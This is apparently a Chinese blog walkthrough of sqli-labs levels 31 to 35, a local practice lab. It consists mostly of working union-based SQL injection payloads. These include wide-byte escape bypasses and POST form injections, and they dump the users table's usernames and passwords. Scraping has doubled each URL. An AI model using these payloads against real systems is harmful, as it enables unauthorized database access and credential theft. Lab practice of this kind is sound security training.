sql-labs31-35关通关攻略

embedded/2024/12/22 15:11:56/

第三十一关

一.判断闭合

1“” 

二.查询数据库

http://127.0.0.1/Less-31/?id=-1%22)%20union%20select%201,2,database()--+icon-default.png?t=N7T8http://127.0.0.1/Less-31/?id=-1%22)%20union%20select%201,2,database()--+

三.查表

http://127.0.0.1/Less-31/?id=-1%22)%20union%20select%201,2,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27)--+icon-default.png?t=N7T8http://127.0.0.1/Less-31/?id=-1%22)%20union%20select%201,2,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27)--+

四.查列

http://127.0.0.1/Less-31/?id=-1%22)%20union%20select%201,2,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27)--+icon-default.png?t=N7T8http://127.0.0.1/Less-31/?id=-1%22)%20union%20select%201,2,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27)--+

五.查询users表中所有数据

 

第三十二关 

一.判断闭合点

1’

二.查询数据库

http://127.0.0.1/Less-32/?id=-1%aa%5c%27%20union%20select%201,2,database()%20--+icon-default.png?t=N7T8http://127.0.0.1/Less-32/?id=-1%AA%5C%27%20union%20select%201,2,database()%20--+

三.查表

http://127.0.0.1/Less-32/?id=-1%aa%5c%27%20union%20select%201,2,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database())%20--+icon-default.png?t=N7T8http://127.0.0.1/Less-32/?id=-1%AA%5C%27%20union%20select%201,2,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database())%20--+

 四.查列 

http://127.0.0.1/Less-32/?id=-1%aa%5c%27%20union%20select%201,2,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=(select%20right(group_concat(table_name),5)%20from%20information_schema.columns%20where%20table_schema=database()))--+icon-default.png?t=N7T8http://127.0.0.1/Less-32/?id=-1%AA%5C%27%20union%20select%201,2,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=(select%20right(group_concat(table_name),5)%20from%20information_schema.columns%20where%20table_schema=database()))--+

五.查user表中所有数据

http://127.0.0.1/Less-32/?id=-1%aa%5c%27%20union%20select%201,2,group_concat(username,0,password)%20from%20users--+icon-default.png?t=N7T8http://127.0.0.1/Less-32/?id=-1%AA%5C%27%20union%20select%201,2,group_concat(username,0,password)%20from%20users--+

三十三关 

一判断闭合方式

1’

二.查询数据库 

http://127.0.0.1/Less-33/?id=-1%aa%5c%27%20union%20select%201,2,database()--+icon-default.png?t=N7T8http://127.0.0.1/Less-33/?id=-1%AA%5C%27%20union%20select%201,2,database()--+

三.查表

http://127.0.0.1/Less-33/?id=-1%aa%5c%27%20union%20select%201,2,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database())--+icon-default.png?t=N7T8http://127.0.0.1/Less-33/?id=-1%AA%5C%27%20union%20select%201,2,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database())--+

 四.查列

http://127.0.0.1/Less-33/?id=-1%aa%5c%27%20union%20select%201,2,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=(select%20right(group_concat(table_name),5)%20from%20information_schema.tables%20where%20table_schema=database()))--+icon-default.png?t=N7T8http://127.0.0.1/Less-33/?id=-1%AA%5C%27%20union%20select%201,2,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=(select%20right(group_concat(table_name),5)%20from%20information_schema.tables%20where%20table_schema=database()))--+

五.查user表里所有数据

http://127.0.0.1/Less-33/?id=-1%aa%5c%27%20union%20select%201,2,(select%20group_concat(username,0,password)%20from%20security.users)--+icon-default.png?t=N7T8http://127.0.0.1/Less-33/?id=-1%AA%5C%27%20union%20select%201,2,(select%20group_concat(username,0,password)%20from%20security.users)--+

 

第三十四关

一.利用burp进行抓包

二.查询数据库

uname=-1%df' union select 1,2#&passwd=1&submit=Submit

三.查表

uname=-1%df' union select  1,group_concat(table_name) from information_schema.tables where table_schema=database()#&passwd=1&submit=Submit

四.查列
 

uname=-1%df' union select 1,group_concat(column_name) from information_schema.columns where table_name=0x656D61696C73#&passwd=1&submit=Submit

五.查user表中所有数据

uname=-1%df' union select 1,group_concat(id,0x3a,email_id) from emails#&passwd=1&submit=Submit

第三十五关

一.查询数据库

http://127.0.0.1/Less-35/?id=-1%20union%20select%201,2,database()--+icon-default.png?t=N7T8http://127.0.0.1/Less-35/?id=-1%20union%20select%201,2,database()--+

二. 查表

http://127.0.0.1/Less-35/?id=-1%20union%20select%201,2,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database())--+icon-default.png?t=N7T8http://127.0.0.1/Less-35/?id=-1%20union%20select%201,2,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database())--+

三.查列

http://127.0.0.1/Less-35/?id=-1%20union%20select%201,2,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=(select%20right(group_concat(table_name),5)%20from%20information_schema.tables%20where%20table_schema=database()))--+icon-default.png?t=N7T8http://127.0.0.1/Less-35/?id=-1%20union%20select%201,2,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=(select%20right(group_concat(table_name),5)%20from%20information_schema.tables%20where%20table_schema=database()))--+

四.查user表里所有数据

http://127.0.0.1/Less-35/?id=-1%20union%20select%201,2,(select%20group_concat(username,0,password)%20from%20security.users)--+icon-default.png?t=N7T8http://127.0.0.1/Less-35/?id=-1%20union%20select%201,2,(select%20group_concat(username,0,password)%20from%20security.users)--+


http://www.ppmy.cn/embedded/103476.html

相关文章

python办公脚本开发学习

功能介绍 此脚本从一个text文件夹中读取一长串文本,其中含有ipv4的地址,然后通过正则将ipv4的地址以数组的形式存储起来。通过与xls表格中的样本数据进行对比,进行过滤,实现功能为:筛选出除了部门为办公领导和生产技术…

django学习入门系列之第十点《django中数据库操作》

文章目录 django中数据库操作ORM安装第三方模块自己创建数据库django连接数据库 往期回顾 django中数据库操作 django内部提供了ORM框架 相当于他内部给你封装起来了 ORM ORM可以帮我们做两件事: 创建,修改,数据库中的表(不用…

TCP协议 配合 Wireshark 分析数据

在TCP连接中,无论是客户端还是服务端,都有可能成为发送端或接收端,这是因为TCP是一个全双工协议,允许数据在同一连接中双向流动 客户端(Client):通常是指主动发起连接请求的一方。例如&#xf…

啥是纳米微纤维?咋制作?有啥用?

大家好,今天我们来聊聊纳米/微纤维——《Tailoring micro/nano-fibers for biomedical applications》发表于《Bioactive Materials》。这些纤维近年来备受关注,因为它们具有独特的功能和性质,在生物医学等领域有广泛应用。它们可以通过多种技…

10:Logic软件原理图中添加电源与GND

Logic软件原理图中添加电源与GND

深度探索Unity与C#:编织游戏世界的奇幻篇章

在数字编织的梦幻之境中,Unity游戏引擎与C#编程语言如同双生子,共同编织着游戏世界的奇幻篇章。《Unity游戏开发实战:从零到C#高手》这本书,不仅仅是技术的堆砌,它更像是一位智慧导师,引领着我们深入探索这…

MacOS 本地打开android模拟器

MacOS 本地打开android模拟器 查看本地安卓模拟器:emulator -list-avds 注意📢:这里会提示你找不到 emulator 命令,此时我们需要进入 cd ~/Library/Android/sdk/tools/ 查看模拟器列表:./emulator -list-avds 启动…

EmguCV学习笔记 VB.Net 第9章 视频操作

版权声明:本文为博主原创文章,转载请在显著位置标明本文出处以及作者网名,未经作者允许不得用于商业目的。 EmguCV是一个基于OpenCV的开源免费的跨平台计算机视觉库,它向C#和VB.NET开发者提供了OpenCV库的大部分功能。 教程VB.net版本请访问…